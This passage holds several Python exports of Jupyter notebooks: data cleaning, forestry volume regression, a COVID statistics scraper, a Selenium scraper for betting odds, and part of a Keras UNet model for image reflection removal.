df[col].replace('#name?', np.nan)\n df[col] = df[col].replace('', np.nan)\n\n\ndf_normalize_strings(df, 'ProductGroup')\ndf_normalize_strings(df, 'Drive_System')\ndf_normalize_strings(df, 'Backhoe_Mounting')\n\ndf['ProductGroup'] = df['ProductGroup'].astype('category')\ndf['Drive_System'] = df['Drive_System'].astype('category')\ndf['Backhoe_Mounting'] = df['Backhoe_Mounting'].astype('category')\n\ndf['ProductGroup'].cat.codes\n\nprint(df['Tire_Size'].unique())\nprint(df['Undercarriage_Pad_Width'].unique())\n\ndf_normalize_strings(df, \"Tire_Size\")\ndf['Tire_Size'].unique()\n\ndf['Tire_Size'] = df['Tire_Size'].str.extract('([0-9.]*)') #regular expression\n\ndf['Tire_Size'].unique()\n\ndf['Tire_Size'] = df['Tire_Size'].astype(float)\n\ndf['Tire_Size'].unique()\n\n\ndef extract_sizes(df, colname):\n df[colname] = df[colname].str.extract('([0-9.]*)', expand=True)\n df[colname] = df[colname].replace('', np.nan) # empty -> NaN\n df[colname] = pd.to_numeric(df[colname]) # convert to number\n\n\nextract_sizes(df, 'Undercarriage_Pad_Width')\nprint(\"Tire_Size\", df['Tire_Size'].unique())\nprint(\"Undercarriage_Pad_Width\", df['Undercarriage_Pad_Width'].unique())\n\n# +\n\nm = df['Tire_Size'].median() # 20.5\ndf['Tire_Size'] = df['Tire_Size'].fillna(m)\ndf['Tire_Size'].unique()\n# -\n\ndf.query(\"MachineHoursCurrentMeter==0\")\n\ndf['saleyear'] = df['saledate'].dt.year\n\ndf['age'] = df['saleyear'] - df['YearMade'] #common in machine learning to help with when bought\n# and when made\n\nsum(df['age'] == 0), len(df)\n\ndf.query(\"MachineHoursCurrentMeter==0 and age>1\")\n\ninconsistent = df.eval(\"MachineHoursCurrentMeter==0 and age>1\")\n\ndf.loc[inconsistent, \"MachineHoursCurrentMeter\"] = np.nan\n\ndf.query(\"MachineHoursCurrentMeter==0 and age>1\")\n\n# ## Exercise 4\n\n# df[(df[colname] <= val) & (df[colname] > val) --> doing multiple where conditions, use paranthesis!!!\n\n# df.loc[df[colname] == val, colname] --> locate all rows with the columns equaling the value and take that column only and do something with it\n#\n# m = ax.scatter(x, y, color = df['col'], vmin = val, vmax = val) --> using scatter with a bunch of different colors for each of the points based on a column, vmin and vmax are cutoffs\n#\n# plt.colorbar(m) --> be able to show the colorbar with that particular coloring\n#\n# pd.to_datetime(df[col]) --> convert a column to a datetime\n#\n# datetimeobj.dt.dayofweek --> do a bunch of datetime operations on the datetime object\n#\n# df.groupby(colnames).func() --> group by a column and perform an aggregate function\n#\n# str.contains(string_val) --> see if a string contains the string value\n\n\n","repo_name":"surengunturumasters/USF_Bootcamp","sub_path":"Visualization/labs/lab-9-24.ipynb","file_name":"lab-9-24.ipynb","file_ext":"py","file_size_in_byte":8245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"32"} +{"seq_id":"14680885390","text":"# + id=\"QnuvhjDdirLn\"\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.linear_model import LinearRegression\n\n# + [markdown] id=\"kSy5yTQld9HR\"\n# #Cálculos necessários \n\n# + id=\"wjDx2PHkGp7b\" colab={\"base_uri\": \"https://localhost:8080/\"} outputId=\"24f5124c-7b9e-456b-8f66-75a1db407214\"\ncubagem_secao = pd.read_csv('/content/BR-SANTAVERONICA-DB-02 - Cubagem.csv', encoding='latin-1', sep =';', on_bad_lines='skip')\ncubagem_secao.columns \n\n# + id=\"TlTQzitPHKB6\"\n# cálculo da área secional\ncubagem_secao['AS'] = 
np.pi*(cubagem_secao['Diâmetro da secção'].pow(2)) / 40000\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"KHPcxQpTPxoa\" outputId=\"0fc07b7a-b4cb-4667-d7e8-350316ae37c3\"\n# cálculo Smalian para volume total \n\ncubagem_secao['Vtotalcasca'] = 0\n\nfor i in range(0,len(cubagem_secao['AS'])-1):\n \n if cubagem_secao['Código da Árvore'].loc[i] == cubagem_secao['Código da Árvore'].loc[i+1]:\n\n cubagem_secao['Vtotalcasca'].loc[i] = ((cubagem_secao['AS'].loc[i]+cubagem_secao['AS'].loc[1+i])/2)*(cubagem_secao['Altura da secção'].loc[i+1]-cubagem_secao['Altura da secção'].loc[i])\n\n else: \n\n cubagem_secao['Vtotalcasca'][i] = 0 \n\n# + id=\"njHx7Uh3hDof\"\nsoma = cubagem_secao[['Código da Árvore','V5casca','Vtotalcasca']].groupby('Código da Árvore').sum()\n\n# + id=\"4R63Mr5VhDt2\"\nmedia = cubagem_secao[['Código da Árvore','DAP', 'HT']].groupby('Código da Árvore').mean()\n\n# + id=\"TqoveinblCFN\"\ncubagem = pd.merge(media, soma, how = 'inner', on = 'Código da Árvore')\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 238} id=\"p7MeBEj0lCKE\" outputId=\"b17eb675-0986-444a-fcd1-2f0b264321db\"\ncubagem.head() \n\n# + id=\"cTR4rl16abgb\"\ncubagem['lnDAP'] = np.log(cubagem['DAP'])\n\n# + id=\"xWjAiqGBabq6\"\ncubagem['lnHT'] = np.log(cubagem['HT'])\n\n# + id=\"Fn04HNARbBxb\"\ncubagem['lnVtcasca'] = np.log(cubagem['Vtotalcasca'])\n\n# + id=\"rsOAGjbtbB38\"\ncubagem['lnV5casca'] = np.log(cubagem['V5casca'])\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 238} id=\"7t5ISpbHab45\" outputId=\"5c5f8639-4b3b-4307-c1fb-aa39194e514e\"\ncubagem.head()\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"CyuAde5-cADr\" outputId=\"ab0b9940-ab65-442d-a49b-f6ad53360955\"\ncubagem.columns\n\n# + id=\"GqNITNJQ7_Q5\"\n#cubagem.to_csv('Cubagem.csv')\n\n# + [markdown] id=\"-T1OJ7lFHfNQ\"\n# #Gráficos de tendência volume seção\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 434} id=\"yE8OSIYqHNaW\" outputId=\"c4027697-1ed8-499c-8a76-07888b3261d4\"\nfig, (ax1, ax2, ax3) = plt.subplots(1,3, figsize=(20,5))\n\nfont = {'family' : 'normal',\n 'weight' : 'bold',\n 'size' : 14}\n\nplt.rc('font', **font)\n\nprint('Gráfico de tendência ')\nprint('\\n')\n\nax1.plot(cubagem_secao['Altura da secção'],cubagem_secao['Diâmetro da secção'], 'o' )\nax2.plot(cubagem_secao['Altura da secção'],cubagem_secao['Vtotalcasca'], 'o')\nax3.plot(cubagem_secao['Altura da secção'],cubagem_secao['V5casca'], 'o')\n\nax1.set(title=\"A\", xlabel=\"\\nAltura da secção \", ylabel=\" Diâmetro da secção\");\n\nax2.set(title=\"B\", xlabel= f\"\\nAltura da secção\", ylabel=\" Volume comercial 5 cm com casca(m³)\");\n\nax3.set(title=\"C\", xlabel= f\"\\nAltura da secção\",ylabel=\" Volume comercial total com casca(m³)\");\n\n\n# + id=\"PJHsIPGbHK4R\"\n\n\n# + [markdown] id=\"H-yiNQ1zC5ps\"\n# #Gráficos de tendência volume totalizado\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 434} id=\"IKSYQzuKADp3\" outputId=\"0a6cdc1f-20e9-46ca-c58c-2402888a5c03\"\nfig, (ax1, ax2, ax3, ax4 ) = plt.subplots(1,4, figsize=(20,5))\n\nfont = {'family' : 'normal',\n 'weight' : 'bold',\n 'size' : 14}\n\nplt.rc('font', **font)\n\nprint('Gráfico de tendência ')\nprint('\\n')\n\nax1.plot(cubagem['DAP'],cubagem['V5casca'], 'o' )\n\nax2.plot(cubagem['HT'],cubagem['V5casca'], 'o')\n\nax3.plot(cubagem['DAP'],cubagem['Vtotalcasca'], 'o')\n\nax4.plot(cubagem['HT'],cubagem['Vtotalcasca'], 'o')\n\nax1.set(title=\"A\", xlabel=f\"\\nDiâmetro médio(cm)-DAP \", ylabel=\" Volume 
comercial 5 cm com casca(m³)\");\n\nax2.set(title=\"B\", xlabel= f\"\\n Altura total(m)-HD\");\n\nax3.set(title=\"C\", xlabel= f\"\\nDiâmetro médioc(cm)-DAP\",ylabel=\" Volume comercial total com casca(m³)\");\n\nax4.set(title=\"D\", xlabel= f\"\\nAltura total (m)-HT\");\n\n# + [markdown] id=\"WRuOSYLy8eKB\"\n# #Schumacher e Hall para os modelos volumétricos\n\n# + [markdown] id=\"J5dc8iCepwrh\"\n# ##Ajuste para volume total com casca\n\n# + id=\"CuBYRa35oby1\"\nX = cubagem[['lnDAP','lnHT']]\n\n# + id=\"WpeIZX09opyy\"\ny_Vtcasca = cubagem['lnVtcasca']\n\n# + id=\"vh3Wrd0Rob1x\"\nmodel_Vtcasca = LinearRegression().fit(X, y_Vtcasca)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"UYUmmw_1ob4o\" outputId=\"ddf421d4-9a82-407f-affd-fb08bbf4b103\"\nprint(\"Regressão Linear (original)\")\nprint(\"Coeficiente R^2 : {:.2f}\".format(model_Vtcasca.score(X, y_Vtcasca)))\n\nprint(\"Descrição do modelo: \")\ns = [\"{0:0.2f}\".format(v) for v in model_Vtcasca.coef_]\nprint(\"w: {} b: {:.2f}\".format(s, model_Vtcasca.intercept_))\n\n# + [markdown] id=\"wkEuB8Pap5QV\"\n# ## Ajuste para volume 5 com casca \n\n# + id=\"cnBmQCPNp68c\"\nX = cubagem[['lnDAP','lnHT']]\n\n# + id=\"RobeYngWwJd-\"\ny_lnV5cmcasca = cubagem['lnV5casca']\n\n# + id=\"E97m1REEwJg7\"\nmodel_lnV5cmcasca = LinearRegression().fit(X, y_lnV5cmcasca)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"C14FiMnfwJlc\" outputId=\"5be13b1f-7fc6-43af-b67d-31a8153f7c1c\"\nprint(\"Regressão Linear (original)\")\nprint(\"Coeficiente R^2 : {:.2f}\".format(model_lnV5cmcasca.score(X, y_lnV5cmcasca)))\n\nprint(\"Descrição do modelo: \")\ns = [\"{0:0.2f}\".format(v) for v in model_lnV5cmcasca.coef_]\nprint(\"w: {} b: {:.2f}\".format(s, model_lnV5cmcasca.intercept_))\n\n# + [markdown] id=\"xGGvHc-NoZun\"\n# #Predição\n\n# + id=\"9ipRnQAe4tCw\" colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 206} outputId=\"68eeb985-8ca6-4d44-961c-05a630463ea3\"\nestima_volume = pd.read_csv('/content/altura_predito.csv', encoding='latin-1', sep =';', on_bad_lines='skip')\nestima_volume.head()\n\n# + id=\"P9v785kQwJn-\"\nestima_volume['lnVtcasca'] = model_Vtcasca.intercept_ + model_Vtcasca.coef_[0]* np.log(estima_volume['DAP']) + model_Vtcasca.coef_[1] * np.log(estima_volume['Hest'])\n\n# + id=\"XxnGR0kMwJqh\"\nestima_volume['lnV5casca'] = model_lnV5cmcasca.intercept_+ model_lnV5cmcasca.coef_[0]* np.log(estima_volume['DAP']) + model_lnV5cmcasca.coef_[1] * np.log(estima_volume['Hest'])\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"7fGlUuGcqnHi\" outputId=\"cab12b27-347b-4c30-80cb-7827951524ee\"\nestima_volume['Vtcasca'] = np.exp(estima_volume['lnVtcasca'])\nestima_volume['Vtcasca'].head()\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"P_C6eP10qnLC\" outputId=\"ee5dc898-951a-4117-8c80-ac458bf6439e\"\nestima_volume['V5casca'] = np.exp(estima_volume['lnV5casca'])\nestima_volume['V5casca'].head()\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"IgPpH3_2qnQI\" outputId=\"74348c65-d694-4416-82f3-bb8917343044\"\nestima_volume\n\n# + id=\"22-dt3iTMM-n\"\nestima_volume.to_csv('CalculoErroamostragem.csv')\n\n# + id=\"BkM4rRN4MNBE\"\n\n\n# + id=\"3VuHZBM_L3wq\"\n\n","repo_name":"ana181084/Desafio_treevia","sub_path":"Inventário Florestal/Processamento_python/volumetrico.ipynb","file_name":"volumetrico.ipynb","file_ext":"py","file_size_in_byte":7022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"3"} +{"seq_id":"19446080512","text":"# + 
[markdown] id=\"view-in-github\" colab_type=\"text\"\n# \"Open\n\n# + id=\"5my_Tqqmb5lj\" colab_type=\"code\" colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 676} outputId=\"a305de3d-f289-44a1-8799-c413b485a471\"\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport requests\nfrom bs4 import BeautifulSoup\nfrom prettytable import PrettyTable\n\nurl = 'https://www.mohfw.gov.in/'\n# make a GET request to fetch the raw HTML content\nweb_content = requests.get(url).content\n# parse the html content\nsoup = BeautifulSoup(web_content, \"html.parser\")\n# remove any newlines and extra spaces from left and right\nextract_contents = lambda row: [x.text.replace('\\n', '') for x in row]\n# find all table rows and data cells within\nstats = [] \nall_rows = soup.find_all('tr')\nfor row in all_rows:\n stat = extract_contents(row.find_all('td')) \n# notice that the data that we require is now a list of length 5\n if len(stat) == 5:\n stats.append(stat)\n#now convert the data into a pandas dataframe for further processing\nnew_cols = [\"Sr.No\", \"States/UT\",\"Confirmed\",\"Recovered\",\"Deceased\"]\nstate_data = pd.DataFrame(data = stats, columns = new_cols)\nstate_data.head()\nstate_data[\"Confirmed\"] = state_data[\"Confirmed\"].map(int)\nstate_data[\"Recovered\"] = state_data[\"Recovered\"].map(int)\nstate_data[\"Deceased\"] = state_data[\"Deceased\"].map(int)\ntable = PrettyTable()\ntable.field_names = (new_cols)\nfor i in stats:\n table.add_row(i)\ntable.add_row([\"\",\"Total\",\n sum(state_data[\"Confirmed\"]), \n sum(state_data[\"Recovered\"]),\n sum(state_data[\"Deceased\"])])\nprint(table)\n\n\n# + id=\"sV2KjxI4cYt6\" colab_type=\"code\" colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 324} outputId=\"8db69b99-080a-4fb0-a8d9-7e96866b251f\"\ngroup_size = [sum(state_data['Confirmed']),\n sum(state_data['Recovered']),\n sum(state_data['Deceased'])]\ngroup_labels = ['Confirmed\\n' + str(sum(state_data['Confirmed'])),\n 'Recovered\\n' + str(sum(state_data['Recovered'])),\n 'Deceased\\n' + str(sum(state_data['Deceased']))]\ncustom_colors = ['skyblue','yellowgreen','tomato']\nplt.figure(figsize = (5,5))\nplt.pie(group_size, labels = group_labels, colors = custom_colors)\ncentral_circle = plt.Circle((0,0), 0.5, color = 'white')\nfig = plt.gcf()\nfig.gca().add_artist(central_circle)\nplt.rc('font', size = 12)\nplt.title('Nationwide total Confirmed, Recovered and Deceased Cases', fontsize = 20)\nplt.show()\n\n# + id=\"fEdHILdScdku\" colab_type=\"code\" colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 638} outputId=\"e24103a8-83ab-4256-bb3e-ba8b5cd53414\"\nsns.set_style('ticks')\nplt.figure(figsize = (15,10))\nplt.barh(state_data['States/UT'], state_data['Confirmed'].map(int),align = 'center', color = 'red', edgecolor = 'darkred')\nplt.xlabel('No. 
of Confirmed cases', fontsize = 18)\nplt.ylabel('States/UT', fontsize = 18)\nplt.gca().invert_yaxis()\nplt.xticks(fontsize = 14)\nplt.yticks(fontsize = 14)\nplt.title('Total Confirmed Cases Statewise', fontsize = 18 )\nfor index, value in enumerate(state_data['Confirmed']):\n plt.text(value, index, str(value), fontsize = 12)\nplt.show()\n","repo_name":"shreyrai99/Corona-Scrapper","sub_path":"CovidTrackerIndia.ipynb","file_name":"CovidTrackerIndia.ipynb","file_ext":"py","file_size_in_byte":3382,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-jupyter-script","pt":"3"} +{"seq_id":"43827662160","text":"# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"EqpJw7O11cJC\" executionInfo={\"status\": \"ok\", \"timestamp\": 1660922362486, \"user_tz\": -120, \"elapsed\": 35844, \"user\": {\"displayName\": \"Christian Motta\", \"userId\": \"13823035978233584585\"}} outputId=\"c3729640-a10d-4751-9592-ba98f5714112\"\n# !pip install selenium\n# !apt-get update\n# !apt install chromium-chromedriver\n# !cp /usr/lib/chromium-browser/chromedriver /usr/bin\n\n# + id=\"F97OARdZYBlS\" colab={\"base_uri\": \"https://localhost:8080/\"} executionInfo={\"status\": \"ok\", \"timestamp\": 1660922431760, \"user_tz\": -120, \"elapsed\": 19914, \"user\": {\"displayName\": \"Christian Motta\", \"userId\": \"13823035978233584585\"}} outputId=\"9f021364-beca-4157-e2be-ae524f224f98\"\nfrom google.colab import drive\ndrive.mount('/content/drive')\n\n# + id=\"SM7_iL4_1ed7\"\nimport sys\nimport logging\nfrom selenium.webdriver.remote.remote_connection import LOGGER\nLOGGER.setLevel(logging.WARNING)\nsys.path.insert(0,'/usr/lib/chromium-browser/chromedriver')\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom tqdm import tqdm_notebook as tqdm\nimport pandas\nimport json\nimport pprint\nimport time\n\n# + id=\"j81jY1ZQ1iLX\"\nchrome_options = webdriver.ChromeOptions()\nchrome_options.add_argument('--headless')\nchrome_options.add_argument('--no-sandbox')\nchrome_options.add_argument('--disable-dev-shm-usage')\nchrome_options.add_argument('window-size=1900,800')\nchrome_options.add_argument(\"user-agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36\")\n#PROXY = \"37.99.224.225:7497\"\n#webdriver.DesiredCapabilities.CHROME['proxy']={\n #\"httpProxy\":PROXY,\n #\"ftpProxy\":PROXY,\n #\"sslProxy\":PROXY,\n #\"proxyType\":\"MANUAL\"\n#}\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"cbpyzIAR12sW\" executionInfo={\"status\": \"ok\", \"timestamp\": 1660922439101, \"user_tz\": -120, \"elapsed\": 841, \"user\": {\"displayName\": \"Christian Motta\", \"userId\": \"13823035978233584585\"}} outputId=\"c86f9440-0ed9-46aa-dc64-8f1cb2adf462\"\nwd = webdriver.Chrome('chromedriver',chrome_options=chrome_options)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 210} id=\"ZBRxBG4x4gJK\" executionInfo={\"status\": \"ok\", \"timestamp\": 1660922448876, \"user_tz\": -120, \"elapsed\": 8410, \"user\": {\"displayName\": \"Christian Motta\", \"userId\": \"13823035978233584585\"}} outputId=\"8d251384-9554-473d-ddea-2cf9af845ee7\"\nwd.get(\"https://www.snai.it/\")\ntime.sleep(5)\n\nwd.save_screenshot('screenshot.png')\n\n# %pylab inline\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimg=mpimg.imread('/content/screenshot.png')\nimgplot = plt.imshow(img)\nplt.show()\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"0nbT21ki1vj2\" 
executionInfo={\"status\": \"ok\", \"timestamp\": 1660922527778, \"user_tz\": -120, \"elapsed\": 554, \"user\": {\"displayName\": \"Christian Motta\", \"userId\": \"13823035978233584585\"}} outputId=\"f7ee15e3-3fbb-486f-9275-4cf333e56adf\"\nbutton = wd.find_elements(by=By.CSS_SELECTOR, value=\"a.elementMenuNew01\")\nlen(button)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"PTcMm7qjDv70\" executionInfo={\"status\": \"ok\", \"timestamp\": 1660921778547, \"user_tz\": -120, \"elapsed\": 290, \"user\": {\"displayName\": \"Christian Motta\", \"userId\": \"13823035978233584585\"}} outputId=\"3d347802-1311-47b0-b92f-194eb1ff74d7\"\nprint(button[0].text)\n\n# + id=\"cdtBsVAj28fX\"\nbutton2 = wd.find_elements(by=By.CSS_SELECTOR, value=\"button.btn-primary.accept-btn\")\nlen(button2)\nbutton2[0].click()\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 210} id=\"uN4iW3y_B1xC\" executionInfo={\"status\": \"ok\", \"timestamp\": 1660922545074, \"user_tz\": -120, \"elapsed\": 1498, \"user\": {\"displayName\": \"Christian Motta\", \"userId\": \"13823035978233584585\"}} outputId=\"ec608949-9652-460f-d921-6be5c82c6c2c\"\nwd.save_screenshot('screenshot.png')\n\n# %pylab inline\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimg=mpimg.imread('/content/screenshot.png')\nimgplot = plt.imshow(img)\nplt.show()\n\n# + id=\"n2ybXCY8G_yy\"\nwd.find_elements(by=By.CSS_SELECTOR, value=\"a.elementMenuNew01\")[0].click()\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 210} id=\"DDN6DE7-KG9k\" executionInfo={\"status\": \"ok\", \"timestamp\": 1660922562827, \"user_tz\": -120, \"elapsed\": 1427, \"user\": {\"displayName\": \"Christian Motta\", \"userId\": \"13823035978233584585\"}} outputId=\"8d1c07a1-df0f-45c2-de94-e6ed7ece5755\"\nwd.save_screenshot('screenshot.png')\n\n# %pylab inline\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimg=mpimg.imread('/content/screenshot.png')\nimgplot = plt.imshow(img)\nplt.show()\n\n# + id=\"yuAJ5afRKLYc\"\nwd.find_elements(by=By.CSS_SELECTOR, value=\"a.list-group-item.collapsed\")[0].click()\ntime.sleep(10)\nwd.find_elements(by=By.CSS_SELECTOR, value=\"a.list-group-item.ng-binding\")[24].click()\ntime.sleep(10)\nwd.find_elements(by=By.CSS_SELECTOR, value=\"a.list-group-item.ng-binding\")[25].click()\ntime.sleep(10)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 210} id=\"0QHSSfvXLx7e\" executionInfo={\"status\": \"ok\", \"timestamp\": 1660923434239, \"user_tz\": -120, \"elapsed\": 1458, \"user\": {\"displayName\": \"Christian Motta\", \"userId\": \"13823035978233584585\"}} outputId=\"89219121-7dae-4aa2-ba34-ebb1daccb772\"\nwd.save_screenshot('screenshot.png')\n\n# %pylab inline\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimg=mpimg.imread('/content/screenshot.png')\nimgplot = plt.imshow(img)\nplt.show()\n\n# + id=\"jJKpMml4Ap79\"\nwd.find_elements(by=By.CSS_SELECTOR, value=\"button.btn.btn-default.col-xs-3.btn-xs.ellipsis.ng-binding.ng-scope\")[17].click()\ntime.sleep(5)\nwd.find_elements(by=By.CSS_SELECTOR, value=\"button.btn.btn-default.col-xs-4.btn-xs.ellipsis.ng-binding.ng-scope\")[0].click()\ntime.sleep(5)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 210} id=\"mtwVVyc4Ar6u\" executionInfo={\"status\": \"ok\", \"timestamp\": 1660923660098, \"user_tz\": -120, \"elapsed\": 1462, \"user\": {\"displayName\": \"Christian Motta\", \"userId\": \"13823035978233584585\"}} 
outputId=\"1693b88d-0ad1-4d80-ef21-7b8d8638371a\"\nwd.save_screenshot('screenshot.png')\n\n# %pylab inline\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimg=mpimg.imread('/content/screenshot.png')\nimgplot = plt.imshow(img)\nplt.show()\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"dLXu3HBICF27\" executionInfo={\"status\": \"ok\", \"timestamp\": 1660899111791, \"user_tz\": -120, \"elapsed\": 252, \"user\": {\"displayName\": \"Marco Di Rita\", \"userId\": \"10050403904916150248\"}} outputId=\"da536e48-9f36-46d2-c05f-d23d69b8ded0\"\nbutton3 = wd.find_elements(by=By.CSS_SELECTOR, value=\"div.col-xs-6.padding-5.text-center\")\nlen(button3)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"tKTspj5uCtQk\" executionInfo={\"status\": \"ok\", \"timestamp\": 1660899113162, \"user_tz\": -120, \"elapsed\": 4, \"user\": {\"displayName\": \"Marco Di Rita\", \"userId\": \"10050403904916150248\"}} outputId=\"7ee3987e-3be7-4679-84b8-5a69696f840a\"\nprint(button3[0].text)\nprint(button3[1].text)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"BvKJJAGkEiiY\" executionInfo={\"status\": \"ok\", \"timestamp\": 1660899114578, \"user_tz\": -120, \"elapsed\": 4, \"user\": {\"displayName\": \"Marco Di Rita\", \"userId\": \"10050403904916150248\"}} outputId=\"0a3deec0-6ecd-41f5-e670-16c3287a1106\"\nlist_quote = wd.find_elements(by=By.CSS_SELECTOR, value=\"div.col-xs-6.padding-5.text-center\")\nprint(len(list_quote))\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"_l6EEMCxFAgQ\" executionInfo={\"status\": \"ok\", \"timestamp\": 1660923742278, \"user_tz\": -120, \"elapsed\": 3799, \"user\": {\"displayName\": \"Christian Motta\", \"userId\": \"13823035978233584585\"}} outputId=\"86c467b2-0eef-4333-b4f6-4440e5b25e95\"\nimport pprint\ndetail_quote = []\nfor i in range(0, 66, 2):\n Team = wd.find_elements(by=By.CSS_SELECTOR, value=\"div.col-xs-6.padding-5.text-center\")[i].text\n Quota = wd.find_elements(by=By.CSS_SELECTOR, value=\"div.col-xs-6.padding-5.text-center\")[i+1].text\n\n detail_quote.append({'Quota': Quota,\n 'Team': Team})\n i = i+2\n\nlen(detail_quote)\npprint.pprint(detail_quote[0:10])\n\n# + id=\"iM4F22Yrx_XR\"\nimport pandas as pd\ndetail_quote = pd.DataFrame(detail_quote)\ndetail_quote.set_index(\"Team\")\ndetail_quote.head()\ndetail_quote.to_csv('snai.csv')\n","repo_name":"MarcoDiRita/Scraping","sub_path":"Scraping SNAI.ipynb","file_name":"Scraping SNAI.ipynb","file_ext":"py","file_size_in_byte":8182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"3"} +{"seq_id":"37393717547","text":"# + id=\"pTST1R45Df88\"\nfrom tensorflow.keras.layers import BatchNormalization\nfrom tensorflow.keras.layers import Conv2D, concatenate, AveragePooling2D\nfrom tensorflow.keras.layers import Conv2DTranspose, Dropout, Concatenate\nfrom tensorflow.keras.layers import LeakyReLU, Activation, Flatten, Dense, Reshape, InputLayer, Input, MaxPooling2D, UpSampling2D\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras.datasets.fashion_mnist import load_data\nfrom tensorflow.keras.datasets import mnist\nfrom tensorflow.keras import backend as K\nimport cv2\nimport os\nimport matplotlib\nimport keras\nimport pandas as pd\nfrom google.colab.patches import cv2_imshow\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport tensorflow as tf\nfrom google.colab.patches import cv2_imshow\nimport 
math\nfrom math import log10, sqrt\nfrom skimage.metrics import structural_similarity as ssim\nfrom copy import deepcopy\nimport random\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"nFRH7RpeDjEh\" outputId=\"ea65f440-12f2-49db-d715-a15fcdb27d10\"\nfrom google.colab import drive\ndrive.mount('/content/drive')\n\n# + id=\"HnNEdt0nDkay\"\n#train data\ntry:\n del imageNoise\n del imageClear\n del imageNoise_valid\n del imageClear_valid\nexcept Exception:\n pass\n#image with reflects\nimageClear = []\nimageNoise = []\nimage_clear_path = '/content/drive/MyDrive/baza/database/clear/'\nimage_noise_path = '/content/drive/MyDrive/baza/database/reflects/'\nfor image in os.listdir(image_clear_path):\n imageClear.append(cv2.imread(os.path.join(image_clear_path, image)))\n imageNoise.append(cv2.imread(os.path.join(image_noise_path, image)))\n\nimageClear = np.array(imageClear, dtype='object')\nimageNoise = np.array(imageNoise, dtype='object')\n\nimageClear = imageClear.astype('float32') / 255.\nimageNoise = imageNoise.astype('float32') / 255.\n\n#validation data\n#image with reflects\nimage_clear_valid_path = '/content/drive/MyDrive/baza/test_base/valid/true/'\nimage_noise_valid_path = '/content/drive/MyDrive/baza/test_base/valid/reflects/'\n\nimageClear_valid = []\nimageNoise_valid = []\nfor image in os.listdir(image_clear_valid_path):\n imageClear_valid.append(cv2.imread(os.path.join(image_clear_valid_path, image)))\n imageNoise_valid.append(cv2.imread(os.path.join(image_noise_valid_path, image)))\nimageNoise_valid = np.array(imageNoise_valid, dtype='object').astype('float32')\nimageClear_valid = np.array(imageClear_valid, dtype='object').astype('float32')\n\n\n\n\n\n\nimageNoise_valid = imageNoise_valid / 255.\nimageClear_valid = imageClear_valid / 255.\n#imageNoise_valid = np.array([prepare_image( imageClear_valid[idx] ) for idx in range(len(imageClear_valid))], dtype='object')\n#dataset normalization\n\n# + id=\"0ufblud4Gqah\"\n#model called trixie - UNet++ type\nclass My_Model_Arch():\n def __init__(self):\n self.kernel_size = ( 3, 3)\n def __prepare_model(self):\n kernel_size = self.kernel_size\n input = Input((256,256,3))\n conv1 = Conv2D(32, kernel_size = kernel_size, activation = 'relu', padding = 'same')(input)\n conv1_2 = Conv2D(32, kernel_size = kernel_size, activation = 'relu', padding = 'same')(conv1)\n conv1_concat = concatenate([conv1, conv1_2], axis = -1)#32\n pool1 = MaxPooling2D(pool_size = (2,2))(conv1_concat)\n conv2 = Conv2D(64, kernel_size = kernel_size, activation = 'relu', padding = 'same')(pool1)\n conv2_1 = Conv2D(64, kernel_size = kernel_size, activation = 'relu', padding = 'same')(conv2)\n conv2_concat = concatenate([conv2_1, conv2], axis = -1)#64\n\n pool2 = MaxPooling2D(pool_size = (2,2))(conv2_concat)\n conv3 = Conv2D(128, kernel_size = kernel_size, activation = 'relu', padding = 'same')(pool2)\n conv3_1 = Conv2D(128, kernel_size = kernel_size, activation = 'relu', padding = 'same')(conv3)\n conv3_concat = concatenate([conv3, conv3_1], axis = -1)#128\n\n pool3 = MaxPooling2D(pool_size 